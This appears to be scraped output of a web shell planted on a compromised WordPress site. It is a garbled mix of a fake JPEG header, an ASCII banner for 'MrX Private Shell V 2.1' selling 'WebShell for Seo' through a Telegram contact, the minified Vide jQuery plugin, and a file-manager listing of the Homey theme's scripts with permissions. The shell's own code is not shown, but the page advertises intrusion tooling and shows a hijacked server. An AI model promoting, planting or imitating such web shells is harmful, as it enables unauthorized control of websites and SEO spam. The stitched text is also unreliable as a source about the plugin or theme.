����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
/*
* Vide - v0.5.1
* Easy as hell jQuery plugin for video backgrounds.
* http://vodkabears.github.io/vide/
*
* Made by Ilya Makarov
* Under MIT License
*/
!function(a,b){"function"==typeof define&&define.amd?define(["jquery"],b):b("object"==typeof exports?require("jquery"):a.jQuery)}(this,function(a){"use strict";function b(a){var b,c,d,e,f,g,h,i={};for(f=a.replace(/\s*:\s*/g,":").replace(/\s*,\s*/g,",").split(","),h=0,g=f.length;h<g&&(c=f[h],c.search(/^(http|https|ftp):\/\//)===-1&&c.search(":")!==-1);h++)b=c.indexOf(":"),d=c.substring(0,b),e=c.substring(b+1),e||(e=void 0),"string"==typeof e&&(e="true"===e||"false"!==e&&e),"string"==typeof e&&(e=isNaN(e)?e:+e),i[d]=e;return null==d&&null==e?a:i}function c(a){a=""+a;var b,c,d,e=a.split(/\s+/),f="50%",g="50%";for(d=0,b=e.length;d<b;d++)c=e[d],"left"===c?f="0%":"right"===c?f="100%":"top"===c?g="0%":"bottom"===c?g="100%":"center"===c?0===d?f="50%":g="50%":0===d?f=c:g=c;return{x:f,y:g}}function d(b,c){var d=function(){c(this.src)};a('<img src="'+b+'.gif">').on("load",d),a('<img src="'+b+'.jpg">').on("load",d),a('<img src="'+b+'.jpeg">').on("load",d),a('<img src="'+b+'.png">').on("load",d)}function e(c,d,e){if(this.$element=a(c),"string"==typeof d&&(d=b(d)),e?"string"==typeof e&&(e=b(e)):e={},"string"==typeof d)d=d.replace(/\.\w*$/,"");else if("object"==typeof d)for(var f in d)d.hasOwnProperty(f)&&(d[f]=d[f].replace(/\.\w*$/,""));this.settings=a.extend({},g,e),this.path=d;try{this.init()}catch(i){if(i.message!==h)throw i}}var f="vide",g={volume:1,playbackRate:1,muted:!0,loop:!0,autoplay:!0,position:"50% 50%",posterType:"detect",resizing:!0,bgColor:"transparent",className:""},h="Not implemented";e.prototype.init=function(){var b,e,f=this,g=f.path,i=g,j="",k=f.$element,l=f.settings,m=c(l.position),n=l.posterType;e=f.$wrapper=a("<div>").addClass(l.className).css({position:"absolute","z-index":-1,top:0,left:0,bottom:0,right:0,overflow:"hidden","-webkit-background-size":"cover","-moz-background-size":"cover","-o-background-size":"cover","background-size":"cover","background-color":l.bgColor,"background-repeat":"no-repeat","background-position":m.x+" "+m.y}),"object"==typeof g&&(g.poster?i=g.poster:g.mp4?i=g.mp4:g.webm?i=g.webm:g.ogv&&(i=g.ogv)),"detect"===n?d(i,function(a){e.css("background-image","url("+a+")")}):"none"!==n&&e.css("background-image","url("+i+"."+n+")"),"static"===k.css("position")&&k.css("position","relative"),k.prepend(e),"object"==typeof g?(g.mp4&&(j+='<source src="'+g.mp4+'.mp4" type="video/mp4">'),g.webm&&(j+='<source src="'+g.webm+'.webm" type="video/webm">'),g.ogv&&(j+='<source src="'+g.ogv+'.ogv" type="video/ogg">'),b=f.$video=a("<video>"+j+"</video>")):b=f.$video=a('<video><source src="'+g+'.mp4" type="video/mp4"><source src="'+g+'.webm" type="video/webm"><source src="'+g+'.ogv" type="video/ogg"></video>');try{b.prop({autoplay:l.autoplay,loop:l.loop,volume:l.volume,muted:l.muted,defaultMuted:l.muted,playbackRate:l.playbackRate,defaultPlaybackRate:l.playbackRate})}catch(o){throw new Error(h)}b.css({margin:"auto",position:"absolute","z-index":-1,top:m.y,left:m.x,"-webkit-transform":"translate(-"+m.x+", -"+m.y+")","-ms-transform":"translate(-"+m.x+", -"+m.y+")","-moz-transform":"translate(-"+m.x+", -"+m.y+")",transform:"translate(-"+m.x+", -"+m.y+")",visibility:"hidden",opacity:0}).one("canplaythrough.vide",function(){f.resize()}).one("playing.vide",function(){b.css({visibility:"visible",opacity:1}),e.css("background-image","none")}),k.on("resize.vide",function(){l.resizing&&f.resize()}),e.append(b)},e.prototype.getVideoObject=function(){return this.$video[0]},e.prototype.resize=function(){if(this.$video){var a=this.$wrapper,b=this.$video,c=b[0],d=c.videoHeight,e=c.videoWidth,f=a.height(),g=a.width();g/e>f/d?b.css({width:g+2,height:"auto"}):b.css({width:"auto",height:f+2})}},e.prototype.destroy=function(){delete a[f].lookup[this.index],this.$video&&this.$video.off(f),this.$element.off(f).removeData(f),this.$wrapper.remove()},a[f]={lookup:[]},a.fn[f]=function(b,c){var d;return this.each(function(){d=a.data(this,f),d&&d.destroy(),d=new e(this,b,c),d.index=a[f].lookup.push(d)-1,a.data(this,f,d)}),this},a(document).ready(function(){var b=a(window);b.on("resize.vide",function(){for(var b,c=a[f].lookup.length,d=0;d<c;d++)b=a[f].lookup[d],b&&b.settings.resizing&&b.resize()}),b.on("unload.vide",function(){return!1}),a(document).find("[data-vide-bg]").each(function(b,c){var d=a(c),e=d.data("vide-options"),g=d.data("vide-bg");d[f](g,e)})})});| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| admin | Folder | 0755 |
|
|
| fullcalendar | Folder | 0755 |
|
|
| leaflet | Folder | 0755 |
|
|
| leafletCluster | Folder | 0755 |
|
|
| bootbox.min.js | File | 9.74 KB | 0644 |
|
| bootstrap-calendar.js | File | 1.86 KB | 0644 |
|
| bootstrap-select.js | File | 58.05 KB | 0644 |
|
| bootstrap-select.js.map | File | 296.2 KB | 0644 |
|
| bootstrap-select.min.js | File | 32.6 KB | 0644 |
|
| bootstrap-select.min.js.map | File | 60.82 KB | 0644 |
|
| bootstrap-slider.min.js | File | 34 KB | 0644 |
|
| bootstrap.min.js | File | 38.75 KB | 0644 |
|
| custom.js | File | 93.73 KB | 0644 |
|
| custom.min.js | File | 41.31 KB | 0644 |
|
| experience-carousel.js | File | 2.38 KB | 0644 |
|
| fancybox-3.min.js | File | 66.67 KB | 0644 |
|
| homey-ajax.js | File | 235.16 KB | 0644 |
|
| homey-ajax.min.js | File | 117.58 KB | 0644 |
|
| homey-exp-maps.js | File | 56.29 KB | 0644 |
|
| homey-exp-maps.min.js | File | 20.61 KB | 0644 |
|
| homey-experience.js | File | 103.97 KB | 0644 |
|
| homey-experience.min.js | File | 49.47 KB | 0644 |
|
| homey-listing.js | File | 105.67 KB | 0644 |
|
| homey-listing.min.js | File | 49.6 KB | 0644 |
|
| homey-maps.js | File | 57.37 KB | 0644 |
|
| homey-maps.min.js | File | 20.7 KB | 0644 |
|
| homey-open-street-exp-maps.js | File | 49.74 KB | 0644 |
|
| homey-open-street-exp-maps.min.js | File | 16.88 KB | 0644 |
|
| homey-open-street-maps.js | File | 50.53 KB | 0644 |
|
| homey-open-street-maps.min.js | File | 17.12 KB | 0644 |
|
| homey-profile.js | File | 25.92 KB | 0644 |
|
| homey-reCapthca.js | File | 935 B | 0644 |
|
| infobox_packed.js | File | 9.4 KB | 0644 |
|
| intlTelInput.min.js | File | 28.71 KB | 0644 |
|
| jquery.matchHeight-min.js | File | 3.3 KB | 0644 |
|
| jquery.matchHeight.js | File | 11.5 KB | 0644 |
|
| jquery.swipebox.js | File | 24.41 KB | 0644 |
|
| jquery.swipebox.min.js | File | 12.7 KB | 0644 |
|
| jquery.validate.min.js | File | 22.36 KB | 0644 |
|
| jquery.vide.min.js | File | 4.38 KB | 0644 |
|
| lightbox.js | File | 19.63 KB | 0644 |
|
| lightslider.min.js | File | 15.65 KB | 0644 |
|
| listing-carousel.js | File | 2.43 KB | 0644 |
|
| markerclusterer.min.js | File | 21.47 KB | 0644 |
|
| modernizr.custom.js | File | 14.6 KB | 0644 |
|
| moment.min.js | File | 143.42 KB | 0644 |
|
| parallax-background.min.js | File | 5.47 KB | 0644 |
|
| richmarker-compiled.js | File | 10.23 KB | 0644 |
|
| slick.min.js | File | 41.86 KB | 0644 |
|
| stripe-sca.js | File | 5.6 KB | 0644 |
|
| theia-sticky-sidebar.js | File | 15.94 KB | 0644 |
|